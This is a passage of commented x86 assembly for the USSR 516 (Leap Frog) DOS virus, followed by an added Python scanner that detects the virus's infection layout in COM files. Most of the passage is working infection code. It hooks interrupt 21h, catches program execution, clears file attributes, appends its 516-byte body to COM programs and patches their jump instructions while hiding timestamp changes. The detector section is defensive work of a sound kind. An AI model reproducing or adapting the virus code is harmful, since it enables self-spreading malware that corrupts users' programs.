                mov     [di+2],ax                      ; change disk buffer
                                                       ; backward offset to
                                                       ; least recently used
                xchg    ax,di                          ; restore EMS page
                mov     [di],ax                        ; set to least recently
movetobuffer:                                          ; used
                mov     di,bx
                push    ds
                pop     es                             ; ES:DI -> disk buffer
                push    cs
                pop     ds
                mov     cx,108h
                lea     si,[bp-4]                      ; Copy from start
                rep     movsw
                mov     ds,cx                          ; DS -> interrupt table
                mov     word ptr ds:[4*21h],0BCh       ; New interrupt handler
                mov     word ptr ds:[4*21h+2],es       ; at int21
quitvir:
                push    cs                             ; CS = DS = ES
                pop     es
                push    es
                pop     ds
                pop     ax
                mov     bx,ax
                mov     si, 100h                       ; set up stack for
                push    si                             ; the return to the
                retn                                   ; original program
int24:
                mov     al,3                           ; Ignore all errors
                iret
tickstore       db      3                              ; Why???
buffer          db      3, 0, 9, 0

int21:
                pushf
                cli                                    ; CP/M style call entry
                call    dword ptr cs:[int30store-start]
                retn                                   ; point of int 21h

int21DSDX:                                             ; For int 21h calls
                push    ds                             ; with
                lds     dx,dword ptr [bp+2]            ; DS:DX -> filename
                call    int21
                pop     ds
                retn

                cmp     ax,4B00h                       ; Execute
                je      Execute
                cmp     ax,5252h                       ; ID check
                je      CheckID
                cmp     ah,30h                         ; DOS Version
                je      DosVersion
callorig21:                                            ; Do other calls
                jmp     dword ptr cs:[int21store-start]
DosVersion:    ; Why?????                             ; DOS Version
                dec     byte ptr cs:[tickstore-start]
                jnz     callorig21                     ; Continue if not 0
                push    es
                xor     ax,ax
                push    ax
                mov     es,ax
                mov     al,es:[46Ch]                   ; 40h:6Ch = Timer ticks
                                                       ; since midnight
                and     al,7                           ; MOD 8
                inc     ax
                inc     ax
                mov     cs:[tickstore-start],al        ; # 2-9
                pop     ax
                pop     es
                iret
CheckID:                                               ; ID Check
                mov     bx,0FFEEh                      ; FFEEh = -12h
                iret
Execute:                                               ; Execute
                push    ax                             ; Save registers
                push    cx
                push    es
                push    bx
                push    ds                             ; DS:DX -> filename
                push    dx                             ; save it on stack
                push    bp
                mov     bp,sp                          ; Set up stack frame
                sub     sp,0Ah                         ; Temporary variables
                                                       ; [bp-A] = attributes
                                                       ; [bp-8] = int 24 off
                                                       ; [bp-6] = int 24 seg
                                                       ; [bp-4] = file time
                                                       ; [bp-2] = file date
                sti
                push    cs
                pop     ds
                mov     ax,3301h                       ; Turn off ^C check
                xor     dl,dl                          ; (never turn it back
                call    int21                          ;  on.  Bug???)
                mov     ax,3524h                       ; Get int 24h
                call    int21                          ; (Critical error)
                mov     [bp-8],bx
                mov     [bp-6],es
                mov     dx,int24-start
                mov     ax,2524h                       ; Set to new one
                call    int21
                mov     ax,4300h                       ; Get attributes
                call    int21DSDX
                jnc     continue
doneinfect:
                mov     ax,2524h                       ; Restore crit error
                lds     dx,dword ptr [bp-8]            ; handler
                call    int21
                cli
                mov     sp,bp
                pop     bp
                pop     dx
                pop     ds
                pop     bx
                pop     es
                pop     cx
                pop     ax
                jmp     short callorig21               ; Call orig handler
continue:
                mov     [bp-0Ah],cx                    ; Save attributes
                test    cl,1                           ; Check if r/o????
                jz      noclearattr
                xor     cx,cx
                mov     ax,4301h                       ; Clear attributes
                call    int21DSDX                      ; Filename in DS:DX
                jc      doneinfect                     ; Quit on error
noclearattr:
                mov     ax,3D02h                       ; Open read/write
                call    int21DSDX                      ; Filename in DS:DX
                jc      doneinfect                     ; Exit if error
                mov     bx,ax
                mov     ax,5700h                       ; Save time/date
                call    int21
                mov     [bp-4],cx
                mov     [bp-2],dx
                mov     dx,buffer-start
                mov     cx,4
                mov     ah,3Fh                         ; Read 4 bytes to
                call    int21                          ; buffer
                jc      quitinf
                cmp     byte ptr ds:[buffer-start],0E9h; Must start with 0E9h
                jne     quitinf                        ; Otherwise, quit
                mov     dx,word ptr ds:[buffer+1-start]; dx = jmploc
                dec     dx
                xor     cx,cx
                mov     ax,4201h                       ; go there
                call    int21
                mov     ds:[buffer-start],ax           ; new location offset
                mov     dx,orig4-start
                mov     cx,4
                mov     ah,3Fh                         ; Read 4 bytes there
                call    int21
                mov     dx,ds:[orig4-start]
                cmp     dl,0E9h                        ; 0E9h means we might
                jne     infect                         ; already be there
                mov     ax,ds:[orig4+2-start]          ; continue checking
                add     al,dh                          ; to see if we really
                sub     al,ah                          ; are there.
                jz      quitinf
infect:
                xor     cx,cx
                mov     dx,cx
                mov     ax,4202h                       ; Go to EOF
                call    int21
                mov     ds:[buffer+2-start],ax         ; save filesize
                mov     cx,204h
                mov     ah,40h                         ; Write virus
                call    int21
                jc      quitinf                        ; Exit if error
                sub     cx,ax
                jnz     quitinf
                mov     dx,ds:[buffer-start]
                mov     ax,ds:[buffer+2-start]
                sub     ax,dx
                sub     ax,3                           ; AX->jmp offset
                mov     word ptr ds:[buffer+1-start],ax; Set up buffer
                mov     byte ptr ds:[buffer-start],0E9h; code the jmp
                add     al,ah
                mov     byte ptr ds:[buffer+3-start],al
                mov     ax,4200h                       ; Rewind to jmploc
                call    int21
                mov     dx, buffer-start
                mov     cx,4                           ; Write in the jmp
                mov     ah,40h
                call    int21
quitinf:
                mov     cx,[bp-4]
                mov     dx,[bp-2]
                mov     ax,5701h                       ; Restore date/time
                call    int21
                mov     ah,3Eh                         ; Close file
                call    int21
                mov     cx,[bp-0Ah]                    ; Restore attributes
                mov     ax,4301h
                call    int21DSDX
                jmp     doneinfect                     ; Return
ussr516         ends
                end     stub
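As an added example for this file (not from the article or its author), here is a defender-side static check for the on-disk layout that the `Execute`/`infect` routines above produce. Reading the disassembly: the virus only accepts a COM host whose first instruction is a near jmp (E9 rel16); it reads the four bytes at that jmp's target, treats `E9 lo hi chk` with `chk == lo + hi` as "already infected" (the `add al,dh` / `sub al,ah` test), otherwise appends 204h bytes of body at end of file and overwrites the target with a new `E9` whose rel16 reaches the appended body, followed by the `lo + hi` marker byte. The check below follows the same chain in a file image and additionally requires the second jmp to land exactly 204h bytes before end of file at a `push ax / call` prefix, which cuts down false positives from hosts that happen to contain a matching marker. Offsets are file offsets (load address minus 100h). The two sample images are constructed inline and labelled as such; the "infected" one carries a zero-filled tail standing in for the body.

```python
"""Static check for the Leap Frog / USSR 516 infection layout in a .COM image.

Derived from the disassembly in this file: the virus only touches COM files
whose first instruction is a near jmp (E9 rel16).  It overwrites the 4 bytes
at that jmp's target with E9 lo hi chk, where lo/hi form a second rel16
pointing at the 204h-byte body appended at end of file and
chk == (lo + hi) mod 256.
"""

VIRUS_SIZE = 0x204          # mov cx,204h before the write in `infect`
BODY_PREFIX = b"\x50\xe8"   # `start:` begins with push ax / call beginvir


def jmp_target(data: bytes, pos: int):
    """File offset that a near jmp (E9 rel16) at `pos` lands on, or None if
    there is no such instruction at `pos`.  Wraps at 64K, like the 16-bit
    seek arithmetic in the virus."""
    if pos + 3 > len(data) or data[pos] != 0xE9:
        return None
    rel = int.from_bytes(data[pos + 1:pos + 3], "little")
    return (pos + 3 + rel) & 0xFFFF


def scan_com(data: bytes) -> dict:
    """Return {'infected': bool, 'reason': str, 'body_offset': int or None}."""
    verdict = {"infected": False, "reason": "", "body_offset": None}
    t1 = jmp_target(data, 0)
    if t1 is None:
        verdict["reason"] = "no initial near jmp; not a host the virus accepts"
        return verdict
    if t1 + 4 > len(data):
        verdict["reason"] = "initial jmp points outside the file"
        return verdict
    patch = data[t1:t1 + 4]
    if patch[0] != 0xE9:
        verdict["reason"] = "jmp target is not patched with a second jmp"
        return verdict
    if patch[3] != ((patch[1] + patch[2]) & 0xFF):
        verdict["reason"] = "marker byte is not lo+hi of the rel16"
        return verdict
    t2 = jmp_target(data, t1)
    if t2 != len(data) - VIRUS_SIZE:
        verdict["reason"] = "second jmp does not land 204h bytes before EOF"
        return verdict
    if data[t2:t2 + 2] != BODY_PREFIX:
        verdict["reason"] = "tail does not begin with push ax / call"
        return verdict
    verdict["infected"] = True
    verdict["reason"] = "Leap Frog layout: jmp -> patched jmp -> 516-byte tail"
    verdict["body_offset"] = t2
    return verdict


def make_fixtures():
    """Constructed samples, not real files.  The clean image is a 40-byte COM
    whose first instruction jumps over 13 filler bytes to offset 10h.  The
    infected image is the same host with the patch and a dummy zero-filled
    tail in place of the body."""
    clean = (b"\xe9\x0d\x00"          # offset 0:   jmp 10h (3 + 0Dh)
             + b"\x90" * 13           # offset 3:   filler
             + b"\xb4\x4c\xcd\x21"    # offset 10h: mov ah,4Ch / int 21h
             + b"\x90" * 20)          # offset 14h..27h: more filler
    # With len(clean) == 40 and the jmp target at 16, the rel16 written by the
    # infection routine is 40 - 16 - 3 = 21 = 0015h, so the patch is E9 15 00 15
    # (marker byte 15h + 00h = 15h).
    patch = b"\xe9\x15\x00\x15"
    tail = BODY_PREFIX + b"\x00" * (VIRUS_SIZE - 2)
    infected = clean[:16] + patch + clean[20:] + tail
    return clean, infected


if __name__ == "__main__":
    for name, image in zip(("clean", "infected"), make_fixtures()):
        print(name, scan_com(image))
```

This only inspects files; it says nothing about whether the resident copy is already sitting in a DOS disk buffer, which is what the `int 21h / ax=5252h` check in the listing is for.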